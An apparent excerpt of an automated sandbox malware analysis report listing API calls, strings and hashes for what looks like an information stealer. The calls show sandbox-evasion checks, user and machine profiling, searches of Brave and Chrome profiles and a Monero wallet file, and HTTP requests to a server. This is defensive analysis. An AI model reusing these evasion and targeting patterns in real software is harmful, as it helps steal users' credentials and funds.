                                    • Opcode ID: fd550e18fbedb16aeaef8178e618a040a0714ffa9945cd195727e52e6d8ae253
                                    • Instruction ID: 8864a380c80d597f0689d3954f7338c9ce638ba41ffa57624df576df4a0c8196
                                    • Opcode Fuzzy Hash: fd550e18fbedb16aeaef8178e618a040a0714ffa9945cd195727e52e6d8ae253
                                    • Instruction Fuzzy Hash: A64181B1D04248AFDB10DF94DC45BEEBBB8BF48704F144199F50977280D7786A88CBA5

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D07C8), ref: 00C498A1
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D06D8), ref: 00C498BA
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D07F8), ref: 00C498D2
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0660), ref: 00C498EA
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0750), ref: 00C49903
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D8800), ref: 00C4991B
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019C6920), ref: 00C49933
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019C67E0), ref: 00C4994C
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D05A0), ref: 00C49964
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0828), ref: 00C4997C
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0588), ref: 00C49995
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D07B0), ref: 00C499AD
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019C66A0), ref: 00C499C5
                                      • Part of subcall function 00C49860: GetProcAddress.KERNEL32(75900000,019D0720), ref: 00C499DE
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C311D0: ExitProcess.KERNEL32 ref: 00C31211
                                      • Part of subcall function 00C31160: GetSystemInfo.KERNEL32(?), ref: 00C3116A
                                      • Part of subcall function 00C31160: ExitProcess.KERNEL32 ref: 00C3117E
                                      • Part of subcall function 00C31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C3112B
                                      • Part of subcall function 00C31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C31132
                                      • Part of subcall function 00C31110: ExitProcess.KERNEL32 ref: 00C31143
                                      • Part of subcall function 00C31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C3123E
                                      • Part of subcall function 00C31220: __aulldiv.LIBCMT ref: 00C31258
                                      • Part of subcall function 00C31220: __aulldiv.LIBCMT ref: 00C31266
                                      • Part of subcall function 00C31220: ExitProcess.KERNEL32 ref: 00C31294
                                      • Part of subcall function 00C46770: GetUserDefaultLangID.KERNEL32 ref: 00C46774
                                      • Part of subcall function 00C31190: ExitProcess.KERNEL32 ref: 00C311C6
                                      • Part of subcall function 00C47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                      • Part of subcall function 00C47850: RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                      • Part of subcall function 00C47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                      • Part of subcall function 00C478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                      • Part of subcall function 00C478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                      • Part of subcall function 00C478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019D8830,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C46AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00C46AF9
                                    • Sleep.KERNEL32(00001770), ref: 00C46B04
                                    • CloseHandle.KERNEL32(?,00000000,?,019D8830,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46B1A
                                    • ExitProcess.KERNEL32 ref: 00C46B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: aac8c02853ebc8a9d5df6a0ff44d94b94af17a6f516778a63bd82e9f7b9ee537
                                    • Instruction ID: 67eedbd294ded08dfa2f935ab88f88d1ca792c4d6e80b52b3e6855ae854e104b
                                    • Opcode Fuzzy Hash: aac8c02853ebc8a9d5df6a0ff44d94b94af17a6f516778a63bd82e9f7b9ee537
                                    • Instruction Fuzzy Hash: C4312870950208ABEB04FBF1DC56BEE7778BF54301F144528F612A21C2DF706A45EAA6

                                    Control-flow Graph (graph rendering omitted; entry block c31220-c31247)
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C3123E
                                    • __aulldiv.LIBCMT ref: 00C31258
                                    • __aulldiv.LIBCMT ref: 00C31266
                                    • ExitProcess.KERNEL32 ref: 00C31294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: d919b37c2cdf3ea38c15efb8b69d078ac3c29b461efd1989c3fbaa1d1830c5d8
                                    • Instruction ID: 827dfd3257df782781c07b994c4be162951b7d82001af821b1c773ef57daae02
                                    • Opcode Fuzzy Hash: d919b37c2cdf3ea38c15efb8b69d078ac3c29b461efd1989c3fbaa1d1830c5d8
                                    • Instruction Fuzzy Hash: 3C016DB0D50308BEEB10EFE0DC49B9EBB78BB54705F288058EB05B62C0D77556459B99

                                    Control-flow Graph (graph rendering omitted)
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019D8830,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C46AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00C46AF9
                                    • Sleep.KERNEL32(00001770), ref: 00C46B04
                                    • CloseHandle.KERNEL32(?,00000000,?,019D8830,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46B1A
                                    • ExitProcess.KERNEL32 ref: 00C46B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 4949f813d2fe20f6099ffc16aea377a723c3ce32d236ec39437ed7c02a325574
                                    • Instruction ID: c17c8fc7fd6d950a1b9e7ee261f4348e56015d41bcc0d20ee3862ea7cc09cdf6
                                    • Opcode Fuzzy Hash: 4949f813d2fe20f6099ffc16aea377a723c3ce32d236ec39437ed7c02a325574
                                    • Instruction Fuzzy Hash: 31F05E70940219AFE700EBA1DC0ABBD7B74FB05701F144925F516B11C5CBB05584FA6B

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: ba5f952cd25be4d0e55bc58461073e9ee18b2c5fe0c46579d138efe12390d4b9
                                    • Instruction ID: ae49a607952d6b907e8f8705630b5dc700e63bdea77f3d4a283c1b590e761bf4
                                    • Opcode Fuzzy Hash: ba5f952cd25be4d0e55bc58461073e9ee18b2c5fe0c46579d138efe12390d4b9
                                    • Instruction Fuzzy Hash: 7A214FB1D00208ABDF14DFA5EC46ADD7B75FB44320F108625F915A72D0DB706A0ADF91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C36280: InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                      • Part of subcall function 00C36280: StrCmpCA.SHLWAPI(?,019DE580), ref: 00C36303
                                      • Part of subcall function 00C36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                      • Part of subcall function 00C36280: HttpOpenRequestA.WININET(00000000,GET,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C36385
                                      • Part of subcall function 00C36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                      • Part of subcall function 00C36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: e3871d914ac265c38273077ce9b3f5311ac331bcac5465da67ad4de592312fb5
                                    • Instruction ID: 9b9cc00b9739a899c52114db704eba6f94c09435564f422ca5af65f8b32b8d86
                                    • Opcode Fuzzy Hash: e3871d914ac265c38273077ce9b3f5311ac331bcac5465da67ad4de592312fb5
                                    • Instruction Fuzzy Hash: 27113030950108ABEB14FF61DD52AED7738BF50300F404168FC1A5B193EF30AB09EA92
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C3112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C31132
                                    • ExitProcess.KERNEL32 ref: 00C31143
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 77dfba2fc83e2540d812facb73b46544bddda024934cbb0b698240a46fdb5928
                                    • Instruction ID: 4f885f13fd2e57bff0f6a39fe4e3988c18fe059a154631ea9fa5b531d114a31c
                                    • Opcode Fuzzy Hash: 77dfba2fc83e2540d812facb73b46544bddda024934cbb0b698240a46fdb5928
                                    • Instruction Fuzzy Hash: 87E08670955308FFE714EBA19C0EB0C76B8AB44B02F140055F70D761C0C6B42644969A
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C310B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C310F7
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 94501f90c781e642ef4c93cd4a87f593a7918701cbb56573855b921afbba730a
                                    • Instruction ID: 2f1178416b60e9c5da4d8fc8a2b4b5fc8350a0c48373e1057cd390b14c69acee
                                    • Opcode Fuzzy Hash: 94501f90c781e642ef4c93cd4a87f593a7918701cbb56573855b921afbba730a
                                    • Instruction Fuzzy Hash: A8F0E2B1641208BFE718EAA4AC49FAEB7E8E705B15F300458F904E7280D5719F44DAA1
                                    APIs
                                      • Part of subcall function 00C478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                      • Part of subcall function 00C478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                      • Part of subcall function 00C478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                      • Part of subcall function 00C47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                      • Part of subcall function 00C47850: RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                      • Part of subcall function 00C47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                    • ExitProcess.KERNEL32 ref: 00C311C6
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: f35501b9a6c8bfea535999b7c7bcb1a9bdfdb8afe4d3e9f58bfc0384a98e249b
                                    • Instruction ID: a4234cc96322c9c090caef9ec00301c7ae563ff523879008550502907ddae38b
                                    • Opcode Fuzzy Hash: f35501b9a6c8bfea535999b7c7bcb1a9bdfdb8afe4d3e9f58bfc0384a98e249b
                                    • Instruction Fuzzy Hash: D0E012B59143015BCA00B7B1AC0AB2E329CAB5474AF0C0939FA09F2142FB65E949A666
                                    APIs
                                    • wsprintfA.USER32 ref: 00C438CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C438E3
                                    • lstrcat.KERNEL32(?,?), ref: 00C43935
                                    • StrCmpCA.SHLWAPI(?,00C50F70), ref: 00C43947
                                    • StrCmpCA.SHLWAPI(?,00C50F74), ref: 00C4395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C43C67
                                    • FindClose.KERNEL32(000000FF), ref: 00C43C7C
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: a4b1625531b62538ad78a6576645faaa9633fd83d5fe6fb6648dc9e2e2d38a0e
                                    • Instruction ID: 404778ecc219565c922bda3c78bf3bdf61b20afa5c36fb8d50f95d3ddbbbe026
                                    • Opcode Fuzzy Hash: a4b1625531b62538ad78a6576645faaa9633fd83d5fe6fb6648dc9e2e2d38a0e
                                    • Instruction Fuzzy Hash: 04A142B1A002189FDB24EFA5DC85FEE7378FB94301F084598E51DA6141EB759B88CF62
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00C50B32,00C50B2B,00000000,?,?,?,00C513F4,00C50B2A), ref: 00C3BEF5
                                    • StrCmpCA.SHLWAPI(?,00C513F8), ref: 00C3BF4D
                                    • StrCmpCA.SHLWAPI(?,00C513FC), ref: 00C3BF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3C7BF
                                    • FindClose.KERNEL32(000000FF), ref: 00C3C7D1
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: 251edb2f9d12c73bd8577ee3b995e580b9dea81eb5e0a1cb95bc9af32c0ca966
                                    • Instruction ID: 8d1f464f53db852cc4946b21991c02bdfbcb554744b4cd2db0ac491c5a4dfc3c
                                    • Opcode Fuzzy Hash: 251edb2f9d12c73bd8577ee3b995e580b9dea81eb5e0a1cb95bc9af32c0ca966
                                    • Instruction Fuzzy Hash: 3A426372950104ABEB14FB70DD96EED737DBF94300F404568F90AA6091EF34AB49DBA2
                                    APIs
                                    • wsprintfA.USER32 ref: 00C4492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                    • StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                    • StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00C44B92
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 0052fc76fa49e94281ad05ff2e1fd32084d39e035bfcc70c3de49b84f55f1965
                                    • Instruction ID: a352f25004cf526c3a341c9ccad46b67003784b91eb1503246c3cc379bc01c3d
                                    • Opcode Fuzzy Hash: 0052fc76fa49e94281ad05ff2e1fd32084d39e035bfcc70c3de49b84f55f1965
                                    • Instruction Fuzzy Hash: 9D6132B2510218AFDB24EBE1DC49FEE737CBB98701F044598E50DA6141EB719B89CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C44580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C44587
                                    • wsprintfA.USER32 ref: 00C445A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C445BD
                                    • StrCmpCA.SHLWAPI(?,00C50FC4), ref: 00C445EB
                                    • StrCmpCA.SHLWAPI(?,00C50FC8), ref: 00C44601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4468B
                                    • FindClose.KERNEL32(000000FF), ref: 00C446A0
                                    • lstrcat.KERNEL32(?,019DE510), ref: 00C446C5
                                    • lstrcat.KERNEL32(?,019DD218), ref: 00C446D8
                                    • lstrlen.KERNEL32(?), ref: 00C446E5
                                    • lstrlen.KERNEL32(?), ref: 00C446F6
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 26e06e9054ccaafbdbccfe2ffc29c7363d42788318e2c73957e509c20fd99df6
                                    • Instruction ID: fda08bea7a7377850ac70992260fc8ed6d0a70d10086858a961417ce3bbaf0f7
                                    • Opcode Fuzzy Hash: 26e06e9054ccaafbdbccfe2ffc29c7363d42788318e2c73957e509c20fd99df6
                                    • Instruction Fuzzy Hash: 225143B2550218AFC724EBB0DC89BED737CBB94301F444599F61DA2190EB749BC88F92
                                    APIs
                                    • wsprintfA.USER32 ref: 00C43EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C43EDA
                                    • StrCmpCA.SHLWAPI(?,00C50FAC), ref: 00C43F08
                                    • StrCmpCA.SHLWAPI(?,00C50FB0), ref: 00C43F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4406C
                                    • FindClose.KERNEL32(000000FF), ref: 00C44081
                                    Strings
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    APIs
                                    • wsprintfA.USER32 ref: 00C3ED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C3ED55
                                    • StrCmpCA.SHLWAPI(?,00C51538), ref: 00C3EDAB
                                    • StrCmpCA.SHLWAPI(?,00C5153C), ref: 00C3EDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3F2AE
                                    • FindClose.KERNEL32(000000FF), ref: 00C3F2C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C515B8,00C50D96), ref: 00C3F71E
                                    • StrCmpCA.SHLWAPI(?,00C515BC), ref: 00C3F76F
                                    • StrCmpCA.SHLWAPI(?,00C515C0), ref: 00C3F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00C3FAC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Similarity
